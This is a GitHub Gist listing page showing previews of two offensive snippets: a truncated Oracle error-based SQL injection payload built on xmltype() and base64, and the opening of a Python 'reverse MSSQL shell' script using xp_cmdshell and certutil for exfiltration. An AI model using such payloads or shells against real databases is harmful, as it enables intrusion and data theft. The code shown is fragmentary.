Skip to content

Instantly share code, notes, and snippets.

Pablo xassiz

Block or report user

Report or block xassiz

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@xassiz
xassiz / oracle_error-based_xmltype.sql
Created Apr 17, 2018
Optimized Oracle error-based SQL injection technique via xmltype() + base64
View oracle_error-based_xmltype.sql
/*
* @description: Optimized Oracle error-based SQLi via xmltype() + base64 (up to 162 bytes/req)
* @author: xassiz
*/
select ''||
xmltype('<'||
regexp_replace(
utl_raw.cast_to_varchar2(
utl_encode.base64_encode(
@xassiz
xassiz / mandros.py
Created Mar 16, 2018
Reverse MSSQL shell
View mandros.py
import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
'''
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz
'''
You can’t perform that action at this time.